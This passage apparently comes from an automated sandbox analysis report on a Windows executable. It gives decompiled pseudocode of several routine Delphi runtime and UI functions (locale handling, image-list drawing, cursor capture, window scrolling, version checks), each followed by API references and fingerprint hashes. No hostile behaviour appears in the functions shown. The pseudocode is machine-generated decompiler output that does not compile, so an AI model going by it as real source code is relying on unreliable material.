                                                                        									__eflags = _t49;
                                                                        									if(_t49 != 0) {
                                                                        										_t51 =  *(_t124 + _t92 - 1) - 0x59;
                                                                        										__eflags = _t51;
                                                                        										if(_t51 == 0) {
                                                                        											L24:
                                                                        											E00404608(_t122, 0x409f30);
                                                                        										} else {
                                                                        											__eflags = _t51 != 0x20;
                                                                        											if(_t51 != 0x20) {
                                                                        												E00404528();
                                                                        												E00404608(_t122, _v24);
                                                                        											} else {
                                                                        												goto L24;
                                                                        											}
                                                                        										}
                                                                        									} else {
                                                                        										E00404608(_t122, 0x409f24);
                                                                        										_t92 = _t92 + 1;
                                                                        									}
                                                                        								} else {
                                                                        									E00404608(_t122, 0x409f10);
                                                                        									_t92 = _t92 + 3;
                                                                        								}
                                                                        							} else {
                                                                        								E00404608(_t122, 0x409efc);
                                                                        								_t92 = _t92 + 1;
                                                                        							}
                                                                        							_t92 = _t92 + 1;
                                                                        							__eflags = _t92;
                                                                        						} else {
                                                                        							_v8 = E0040AA54(_t124, _t92);
                                                                        							E00404858(_t124, _v8, _t92,  &_v20);
                                                                        							E00404608(_t122, _v20);
                                                                        							_t92 = _t92 + _v8;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					_t75 =  *0x4967f4; // 0x9
                                                                        					_t76 = _t75 - 4;
                                                                        					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
                                                                        						_t77 = 1;
                                                                        					} else {
                                                                        						_t77 = 0;
                                                                        					}
                                                                        					if(_t77 == 0) {
                                                                        						E0040439C(_t122, _t124);
                                                                        					} else {
                                                                        						while(_t92 <= E00404600(_t124)) {
                                                                        							_t83 =  *(_t124 + _t92 - 1) - 0x47;
                                                                        							__eflags = _t83;
                                                                        							if(_t83 != 0) {
                                                                        								__eflags = _t83 != 0x20;
                                                                        								if(_t83 != 0x20) {
                                                                        									E00404528();
                                                                        									E00404608(_t122, _v16);
                                                                        								}
                                                                        							}
                                                                        							_t92 = _t92 + 1;
                                                                        							__eflags = _t92;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				L28:
                                                                        				_pop(_t111);
                                                                        				 *[fs:eax] = _t111;
                                                                        				_push(E00409EDD);
                                                                        				return E0040436C( &_v24, 4);
                                                                        			}


                                                                        APIs
                                                                        • GetThreadLocale.KERNEL32(?,00000000,00409ED6,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00409D3B
                                                                          • Part of subcall function 004099D4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 004099F2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Locale$InfoThread
                                                                        • String ID: eeee$ggg$yyyy
                                                                        • API String ID: 4232894706-1253427255
                                                                        • Opcode ID: 82683e19e74f71baa744da0d5f42b6636c256237529d645d5da37ec4d029c50c
                                                                        • Instruction ID: b6f270290c82287ec602cd9da47892ec98d791b565545ab25068ff88157d7675
                                                                        • Opcode Fuzzy Hash: 82683e19e74f71baa744da0d5f42b6636c256237529d645d5da37ec4d029c50c
                                                                        • Instruction Fuzzy Hash: B041F3743041054BC711EAA9C8816BFB395DFC5308B64483BE582F33D7EA3DAC0296AE
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 60%
                                                                        			E00443F90(intOrPtr __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr* _v16;
                                                                        				intOrPtr* _v20;
                                                                        				char _v36;
                                                                        				intOrPtr _t69;
                                                                        				void* _t90;
                                                                        				intOrPtr _t108;
                                                                        				void* _t117;
                                                                        				void* _t118;
                                                                        				void* _t119;
                                                                        				void* _t120;
                                                                        				void* _t121;
                                                                        				intOrPtr _t122;
                                                                        
                                                                        				_t120 = _t121;
                                                                        				_t122 = _t121 + 0xffffffe0;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				E00412BCC( *((intOrPtr*)(_v8 + 0x34)), 0,  &_v36,  *((intOrPtr*)(_v8 + 0x30)));
                                                                        				E00444A0C(_v8);
                                                                        				 *[fs:eax] = _t122;
                                                                        				_v16 = E004242CC(1);
                                                                        				 *[fs:eax] = _t122;
                                                                        				 *((intOrPtr*)( *_v16 + 0x34))( *[fs:eax], 0x4440fb, _t120,  *[fs:eax], 0x444118, _t120, __edi, __esi, __ebx, _t119);
                                                                        				 *((intOrPtr*)( *_v16 + 0x40))();
                                                                        				_v20 = E004242CC(1);
                                                                        				 *[fs:eax] = _t122;
                                                                        				E004256E4(_v20, 1);
                                                                        				 *((intOrPtr*)( *_v20 + 0x34))( *[fs:eax], 0x4440de, _t120);
                                                                        				 *((intOrPtr*)( *_v20 + 0x40))();
                                                                        				_t69 = _v12;
                                                                        				_push(_t69);
                                                                        				L00426AA0();
                                                                        				_t117 = _t69 - 1;
                                                                        				if(_t117 >= 0) {
                                                                        					_t118 = _t117 + 1;
                                                                        					_t90 = 0;
                                                                        					do {
                                                                        						E004202E8(E00424894(_v16),  &_v36);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(E00420730(_t74));
                                                                        						_push(_t90);
                                                                        						_push(_v12);
                                                                        						L00426AD8();
                                                                        						E004202E8(E00424894(_v20),  &_v36);
                                                                        						_push(0x10);
                                                                        						_push(0);
                                                                        						_push(0);
                                                                        						_push(E00420730(_t81));
                                                                        						_push(_t90);
                                                                        						_push(_v12);
                                                                        						L00426AD8();
                                                                        						E00443820(_v8, _t90, _v20, _v16, _t118, 0);
                                                                        						_t90 = _t90 + 1;
                                                                        						_t118 = _t118 - 1;
                                                                        					} while (_t118 != 0);
                                                                        				}
                                                                        				_pop(_t108);
                                                                        				 *[fs:eax] = _t108;
                                                                        				_push(0x4440e5);
                                                                        				return E004035DC(_v20);
                                                                        			}


















                                                                        APIs
                                                                        • 73451FD0.COMCTL32(?,?,?,00000000,00444118), ref: 0044404F
                                                                          • Part of subcall function 004202E8: FillRect.USER32 ref: 00420310
                                                                        • 73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00444118), ref: 00444085
                                                                        • 73452500.COMCTL32(?,00000000,00000000,00000000,00000000,00000010,?,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 004440B1
                                                                          • Part of subcall function 00443820: 734520C0.COMCTL32(?,00000000,00000000,00000000,004438B2,?,00000000,004438CF), ref: 00443894
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 73452500$73451734520FillRect
                                                                        • String ID: DA
                                                                        • API String ID: 3869139703-2080325668
                                                                        • Opcode ID: 994ccba529f062b7918306dd2f5701bd664af3080c55d195bdf6221c89ee9527
                                                                        • Instruction ID: 274bc86385f0dda2e4b4f1d6e4670416b346b4c3e9b855bbcb09a17cbb89921f
                                                                        • Opcode Fuzzy Hash: 994ccba529f062b7918306dd2f5701bd664af3080c55d195bdf6221c89ee9527
                                                                        • Instruction Fuzzy Hash: 16411E74B00214AFDB01EFA6C891E9EB7F9FB89704F5144A6F800EB751CA75AD01CB58
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0043478C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
                                                                        				intOrPtr _v16;
                                                                        				intOrPtr _t24;
                                                                        				intOrPtr _t26;
                                                                        				intOrPtr _t28;
                                                                        				intOrPtr* _t31;
                                                                        				intOrPtr _t34;
                                                                        				intOrPtr _t36;
                                                                        				struct HWND__* _t37;
                                                                        				intOrPtr _t38;
                                                                        				intOrPtr* _t40;
                                                                        				intOrPtr _t44;
                                                                        				intOrPtr _t48;
                                                                        				intOrPtr* _t52;
                                                                        				long _t57;
                                                                        				intOrPtr _t58;
                                                                        				intOrPtr _t59;
                                                                        				intOrPtr* _t64;
                                                                        				intOrPtr _t65;
                                                                        				intOrPtr _t69;
                                                                        				intOrPtr* _t76;
                                                                        				void* _t78;
                                                                        				intOrPtr* _t79;
                                                                        				long long _t86;
                                                                        
                                                                        				_t86 = __fp0;
                                                                        				_t79 = _t78 + 0xfffffff8;
                                                                        				_t69 = __ecx;
                                                                        				_t44 = __edx;
                                                                        				_t76 = __eax;
                                                                        				 *0x496b8c = __eax;
                                                                        				_t24 =  *0x496b8c; // 0x0
                                                                        				 *((intOrPtr*)(_t24 + 4)) = 0;
                                                                        				GetCursorPos(0x496b98);
                                                                        				_t26 =  *0x496b8c; // 0x0
                                                                        				_t57 = 0x496b98->x; // 0x0
                                                                        				 *(_t26 + 0xc) = _t57;
                                                                        				_t58 =  *0x496b9c; // 0x0
                                                                        				 *((intOrPtr*)(_t26 + 0x10)) = _t58;
                                                                        				 *0x496ba0 = GetCursor();
                                                                        				_t28 =  *0x496b8c; // 0x0
                                                                        				"SPhP;C"();
                                                                        				 *0x496b94 = _t28;
                                                                        				 *0x496ba4 = _t69;
                                                                        				_t59 =  *0x4311cc; // 0x431218
                                                                        				if(E00403768(_t76, _t59) == 0) {
                                                                        					__eflags = _t44;
                                                                        					if(__eflags == 0) {
                                                                        						 *0x496ba8 = 0;
                                                                        					} else {
                                                                        						 *0x496ba8 = 1;
                                                                        					}
                                                                        				} else {
                                                                        					_t64 = _t76;
                                                                        					_t4 = _t64 + 0x44; // 0x44
                                                                        					_t40 = _t4;
                                                                        					_t48 =  *_t40;
                                                                        					if( *((intOrPtr*)(_t40 + 8)) - _t48 <= 0) {
                                                                        						__eflags = 0;
                                                                        						 *((intOrPtr*)(_t64 + 0x20)) = 0;
                                                                        						 *((intOrPtr*)(_t64 + 0x24)) = 0;
                                                                        					} else {
                                                                        						 *_t79 =  *((intOrPtr*)(_t64 + 0xc)) - _t48;
                                                                        						asm("fild dword [esp]");
                                                                        						_v16 =  *((intOrPtr*)(_t40 + 8)) -  *_t40;
                                                                        						asm("fild dword [esp+0x4]");
                                                                        						asm("fdivp st1, st0");
                                                                        						 *((long long*)(_t64 + 0x20)) = __fp0;
                                                                        						asm("wait");
                                                                        					}
                                                                        					_t65 =  *((intOrPtr*)(_t40 + 4));
                                                                        					if( *((intOrPtr*)(_t40 + 0xc)) - _t65 <= 0) {
                                                                        						__eflags = 0;
                                                                        						 *((intOrPtr*)(_t76 + 0x28)) = 0;
                                                                        						 *((intOrPtr*)(_t76 + 0x2c)) = 0;
                                                                        					} else {
                                                                        						_t52 = _t76;
                                                                        						 *_t79 =  *((intOrPtr*)(_t52 + 0x10)) - _t65;
                                                                        						asm("fild dword [esp]");
                                                                        						_v16 =  *((intOrPtr*)(_t40 + 0xc)) -  *((intOrPtr*)(_t40 + 4));
                                                                        						asm("fild dword [esp+0x4]");
                                                                        						asm("fdivp st1, st0");
                                                                        						 *((long long*)(_t52 + 0x28)) = _t86;
                                                                        						asm("wait");
                                                                        					}
                                                                        					if(_t44 == 0) {
                                                                        						 *0x496ba8 = 0;
                                                                        					} else {
                                                                        						 *0x496ba8 = 2;
                                                                        						 *((intOrPtr*)( *_t76 + 0x30))();
                                                                        					}
                                                                        				}
                                                                        				_t31 =  *0x496b8c; // 0x0
                                                                        				 *0x496bac =  *((intOrPtr*)( *_t31 + 8))();
                                                                        				_t84 =  *0x496bac;
                                                                        				if( *0x496bac != 0) {
                                                                        					_t36 =  *0x496b9c; // 0x0
                                                                        					_t37 = GetDesktopWindow();
                                                                        					_t38 =  *0x496bac; // 0x0
                                                                        					E0043E5DC(_t38, _t37, _t84, _t36);
                                                                        				}
                                                                        				_t34 = E004035AC(1);
                                                                        				 *0x496bb4 = _t34;
                                                                        				if( *0x496ba8 != 0) {
                                                                        					_t34 = E004344BC(0x496b98, 1);
                                                                        				}
                                                                        				return _t34;
                                                                        			}



























                                                                        APIs
                                                                        • GetCursorPos.USER32(00496B98), ref: 004347AD
                                                                        • GetCursor.USER32(00496B98), ref: 004347C9
                                                                          • Part of subcall function 004339CC: SetCapture.USER32(00000000,?,004347DD,00496B98), ref: 004339DB
                                                                        • GetDesktopWindow.USER32 ref: 004348BB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Cursor$CaptureDesktopWindow
                                                                        • String ID: 8C
                                                                        • API String ID: 669539147-1061565219
                                                                        • Opcode ID: a4fa84824f4e5cf1615e483614cf6fe70a484704f0cac04b0c9c92be734f6c2e
                                                                        • Instruction ID: 23d7adcb388defc9bd6fa9e8aedec287cf5aea9bdfeb159da65cc808b88cf330
                                                                        • Opcode Fuzzy Hash: a4fa84824f4e5cf1615e483614cf6fe70a484704f0cac04b0c9c92be734f6c2e
                                                                        • Instruction Fuzzy Hash: CB416AB46042508FC708EF69E944656BBE1ABD8318F26C57FD449CB3A2EB35F841CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E0040A590(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                        				char _v8;
                                                                        				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                        				char _v297;
                                                                        				char _v304;
                                                                        				intOrPtr _v308;
                                                                        				char _v312;
                                                                        				char _v316;
                                                                        				char _v320;
                                                                        				intOrPtr _v324;
                                                                        				char _v328;
                                                                        				void* _v332;
                                                                        				char _v336;
                                                                        				char _v340;
                                                                        				char _v344;
                                                                        				char _v348;
                                                                        				intOrPtr _v352;
                                                                        				char _v356;
                                                                        				char _v360;
                                                                        				char _v364;
                                                                        				void* _v368;
                                                                        				char _v372;
                                                                        				intOrPtr _t52;
                                                                        				intOrPtr _t60;
                                                                        				intOrPtr _t82;
                                                                        				intOrPtr _t86;
                                                                        				intOrPtr _t89;
                                                                        				intOrPtr _t101;
                                                                        				void* _t108;
                                                                        				intOrPtr _t110;
                                                                        				void* _t113;
                                                                        
                                                                        				_t108 = __edi;
                                                                        				_v372 = 0;
                                                                        				_v336 = 0;
                                                                        				_v344 = 0;
                                                                        				_v340 = 0;
                                                                        				_v8 = 0;
                                                                        				_push(_t113);
                                                                        				_push(0x40a74b);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t113 + 0xfffffe90;
                                                                        				_t89 =  *((intOrPtr*)(_a4 - 4));
                                                                        				if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
                                                                        					_t52 =  *0x495ad4; // 0x4075d4
                                                                        					E00406548(_t52,  &_v8);
                                                                        				} else {
                                                                        					_t86 =  *0x495c54; // 0x4075cc
                                                                        					E00406548(_t86,  &_v8);
                                                                        				}
                                                                        				_t110 =  *((intOrPtr*)(_t89 + 0x18));
                                                                        				VirtualQuery( *(_t89 + 0xc),  &_v36, 0x1c);
                                                                        				if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase,  &_v297, 0x105) == 0) {
                                                                        					_v368 =  *(_t89 + 0xc);
                                                                        					_v364 = 5;
                                                                        					_v360 = _v8;
                                                                        					_v356 = 0xb;
                                                                        					_v352 = _t110;
                                                                        					_v348 = 5;
                                                                        					_t60 =  *0x495ba8; // 0x407574
                                                                        					E00406548(_t60,  &_v372);
                                                                        					E0040A1B8(_t89, _v372, 1, _t108, _t110, 2,  &_v368);
                                                                        				} else {
                                                                        					_v332 =  *(_t89 + 0xc);
                                                                        					_v328 = 5;
                                                                        					E004045B0( &_v340, 0x105,  &_v297);
                                                                        					E00408AC8(_v340,  &_v336);
                                                                        					_v324 = _v336;
                                                                        					_v320 = 0xb;
                                                                        					_v316 = _v8;
                                                                        					_v312 = 0xb;
                                                                        					_v308 = _t110;
                                                                        					_v304 = 5;
                                                                        					_t82 =  *0x495b4c; // 0x407624
                                                                        					E00406548(_t82,  &_v344);
                                                                        					E0040A1B8(_t89, _v344, 1, _t108, _t110, 3,  &_v332);
                                                                        				}
                                                                        				_pop(_t101);
                                                                        				 *[fs:eax] = _t101;
                                                                        				_push(E0040A752);
                                                                        				E00404348( &_v372);
                                                                        				E0040436C( &_v344, 3);
                                                                        				return E00404348( &_v8);
                                                                        			}


































                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040A74B), ref: 0040A5FB
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040A74B), ref: 0040A61D
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileLoadModuleNameQueryStringVirtual
                                                                        • String ID: $v@$tu@
                                                                        • API String ID: 902310565-2066366626
                                                                        • Opcode ID: 9ba32f01379c519203fd593cd7103645b6150b85267e70208000b084934e0a5e
                                                                        • Instruction ID: b8250315685de19ce3eef807cd591484c91ae11c3ead26debf93d0050c9e99c4
                                                                        • Opcode Fuzzy Hash: 9ba32f01379c519203fd593cd7103645b6150b85267e70208000b084934e0a5e
                                                                        • Instruction Fuzzy Hash: B0410470900628DFDB61DF64CC85BDAB7F4AB49304F4140EAE908AB391D778AE84CF95
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0043C824(void* __eax, intOrPtr __ecx, intOrPtr __edx) {
                                                                        				char _t23;
                                                                        				struct HWND__* _t42;
                                                                        				void* _t43;
                                                                        				intOrPtr _t47;
                                                                        				void* _t54;
                                                                        				void* _t56;
                                                                        				void* _t57;
                                                                        				void* _t58;
                                                                        				intOrPtr* _t59;
                                                                        
                                                                        				 *((intOrPtr*)(_t59 + 4)) = __ecx;
                                                                        				 *_t59 = __edx;
                                                                        				_t54 = __eax;
                                                                        				_t42 =  *(__eax + 0x180);
                                                                        				if(_t42 == 0 || IsWindowVisible(_t42) == 0) {
                                                                        					_t23 = 0;
                                                                        				} else {
                                                                        					_t23 = 1;
                                                                        				}
                                                                        				 *((char*)(_t59 + 8)) = _t23;
                                                                        				if( *((char*)(_t59 + 8)) != 0) {
                                                                        					ScrollWindow( *(_t54 + 0x180),  *(_t59 + 0xc),  *(_t59 + 0xc), 0, 0);
                                                                        				}
                                                                        				_t56 = E00439AB4(_t54) - 1;
                                                                        				if(_t56 < 0) {
                                                                        					L14:
                                                                        					return E00439644();
                                                                        				} else {
                                                                        					_t57 = _t56 + 1;
                                                                        					_t58 = 0;
                                                                        					do {
                                                                        						_t43 = E00439A78(_t54, _t58);
                                                                        						_t47 =  *0x4323f0; // 0x43243c
                                                                        						if(E00403768(_t43, _t47) == 0 ||  *(_t43 + 0x180) == 0) {
                                                                        							 *((intOrPtr*)(_t43 + 0x40)) =  *((intOrPtr*)(_t43 + 0x40)) +  *_t59;
                                                                        							 *((intOrPtr*)(_t43 + 0x44)) =  *((intOrPtr*)(_t43 + 0x44)) +  *((intOrPtr*)(_t59 + 4));
                                                                        						} else {
                                                                        							if( *((char*)(_t59 + 8)) == 0) {
                                                                        								SetWindowPos( *(_t43 + 0x180), 0,  *((intOrPtr*)(_t43 + 0x40)) +  *((intOrPtr*)(_t59 + 0x10)),  *((intOrPtr*)(_t34 + 0x44)) +  *((intOrPtr*)(_t59 + 0x10)),  *(_t34 + 0x48),  *(_t34 + 0x4c), 0x14);
                                                                        							}
                                                                        						}
                                                                        						_t58 = _t58 + 1;
                                                                        						_t57 = _t57 - 1;
                                                                        					} while (_t57 != 0);
                                                                        					goto L14;
                                                                        				}
                                                                        			}













                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 0043C83F
                                                                        • ScrollWindow.USER32 ref: 0043C86E
                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014), ref: 0043C8E4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$ScrollVisible
                                                                        • String ID: <$C
                                                                        • API String ID: 4127837035-3423417450
                                                                        • Opcode ID: a5d84af2d4f07ff20e143fdc83744df652cb0839f96734090538049e476dac64
                                                                        • Instruction ID: 2152d0f343ca8ced43e7147e59c3894d671bac6e37dc3256dc1c566f4991c98f
                                                                        • Opcode Fuzzy Hash: a5d84af2d4f07ff20e143fdc83744df652cb0839f96734090538049e476dac64
                                                                        • Instruction Fuzzy Hash: CD21DB31604340ABC714EA69CCC0B6BB7E8AF8C305F14956EF648DB352D638ED01879A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 45%
                                                                        			E0046CC50(void* __ebx, void* __esi) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				intOrPtr _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				void* _t24;
                                                                        				intOrPtr _t29;
                                                                        				intOrPtr _t35;
                                                                        				void* _t40;
                                                                        				intOrPtr _t45;
                                                                        				intOrPtr _t47;
                                                                        				void* _t49;
                                                                        				void* _t51;
                                                                        				void* _t52;
                                                                        				intOrPtr _t53;
                                                                        
                                                                        				_t51 = _t52;
                                                                        				_t53 = _t52 + 0xffffffec;
                                                                        				_v8 = 0;
                                                                        				_push(_t51);
                                                                        				_push(0x46cd28);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t53;
                                                                        				if( *0x496c98 != 0) {
                                                                        					L6:
                                                                        					_pop(_t45);
                                                                        					 *[fs:eax] = _t45;
                                                                        					_push(0x46cd2f);
                                                                        					return E00404348( &_v8);
                                                                        				} else {
                                                                        					E004043E0( &_v8, "comctl32.dll");
                                                                        					_push( &_v12);
                                                                        					_t24 = E004047F8(_v8);
                                                                        					_t49 = _t24;
                                                                        					_push(_t49);
                                                                        					L00406AAC();
                                                                        					_t40 = _t24;
                                                                        					if(_t40 == 0) {
                                                                        						goto L6;
                                                                        					} else {
                                                                        						_v16 = E00402754(_t40);
                                                                        						_push(_t51);
                                                                        						_push(0x46cd05);
                                                                        						_push( *[fs:eax]);
                                                                        						 *[fs:eax] = _t53;
                                                                        						_push(_v16);
                                                                        						_push(_t40);
                                                                        						_t29 = _v12;
                                                                        						_push(_t29);
                                                                        						_push(_t49);
                                                                        						L00406AA4();
                                                                        						if(_t29 != 0) {
                                                                        							_push( &_v24);
                                                                        							_push( &_v20);
                                                                        							_push("\\");
                                                                        							_t35 = _v16;
                                                                        							_push(_t35);
                                                                        							L00406AB4();
                                                                        							if(_t35 != 0) {
                                                                        								 *0x496c98 =  *((intOrPtr*)(_v20 + 8));
                                                                        							}
                                                                        						}
                                                                        						_pop(_t47);
                                                                        						 *[fs:eax] = _t47;
                                                                        						_push(0x46cd0c);
                                                                        						return E00402774(_v16);
                                                                        					}
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                        • 739414E0.VERSION(00000000,?,00000000,0046CD28), ref: 0046CC94
                                                                        • 739414C0.VERSION(00000000,?,00000000,?,00000000,0046CD05,?,00000000,?,00000000,0046CD28), ref: 0046CCC1
                                                                        • 73941500.VERSION(?,0046CD50,?,?,00000000,?,00000000,?,00000000,0046CD05,?,00000000,?,00000000,0046CD28), ref: 0046CCDB
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: 739414$73941500
                                                                        • String ID: comctl32.dll
                                                                        • API String ID: 1696551078-431930879
                                                                        • Opcode ID: 4370ec33bb2a3535abdd9756b92c62f29a947cde4d107e1b0ccf349f1ab6d9cc
                                                                        • Instruction ID: 7ec7435803e1971a03311a5c6c3e11d69c247d37a00d9ae0bfaa4f5d1cfef9b6
                                                                        • Opcode Fuzzy Hash: 4370ec33bb2a3535abdd9756b92c62f29a947cde4d107e1b0ccf349f1ab6d9cc
                                                                        • Instruction Fuzzy Hash: 8D214F75600208AFDB01EFA9DC91DAE77FCEB49300B524477F944E3691E778AE008A69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 59%
                                                                        			E00424D94(intOrPtr __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, intOrPtr _a4, char _a8, void* _a12) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				intOrPtr _t62;
                                                                        				intOrPtr _t64;
                                                                        				intOrPtr _t67;
                                                                        				void* _t77;
                                                                        				void* _t78;
                                                                        				intOrPtr _t79;
                                                                        				intOrPtr _t80;
                                                                        
                                                                        				_t77 = _t78;
                                                                        				_t79 = _t78 + 0xfffffff8;
                                                                        				_v8 = __eax;
                                                                        				_v12 = E004035AC(1);
                                                                        				_push(_t77);
                                                                        				_push(0x424e1b);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t79;
                                                                        				 *((intOrPtr*)(_v12 + 8)) = __edx;
                                                                        				 *((intOrPtr*)(_v12 + 0x10)) = __ecx;
                                                                        				memcpy(_v12 + 0x18, _a12, 0x15 << 2);
                                                                        				_t80 = _t79 + 0xc;
                                                                        				 *((char*)(_v12 + 0x70)) = _a8;
                                                                        				if( *((intOrPtr*)(_v12 + 0x2c)) != 0) {
                                                                        					 *((intOrPtr*)(_v12 + 0x14)) =  *((intOrPtr*)(_v12 + 8));
                                                                        				}
                                                                        				_t62 =  *0x41232c; // 0x412378
                                                                        				 *((intOrPtr*)(_v12 + 0x6c)) = E0040378C(_a4, _t62);
                                                                        				_pop(_t64);
                                                                        				 *[fs:eax] = _t64;
                                                                        				_push(0x496a44);
                                                                        				L004068AC();
                                                                        				_push(_t77);
                                                                        				_push(0x424e7b);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t80;
                                                                        				E00423828( *((intOrPtr*)(_v8 + 0x28)));
                                                                        				 *((intOrPtr*)(_v8 + 0x28)) = _v12;
                                                                        				E00423824(_v12);
                                                                        				_pop(_t67);
                                                                        				 *[fs:eax] = _t67;
                                                                        				_push(E00424E82);
                                                                        				_push(0x496a44);
                                                                        				L004069F4();
                                                                        				return 0;
                                                                        			}













                                                                        APIs
                                                                        • RtlEnterCriticalSection.KERNEL32(00496A44,00000000,?,?), ref: 00424E37
                                                                        • RtlLeaveCriticalSection.KERNEL32(00496A44,00424E82,00496A44,00000000,?,?), ref: 00424E75
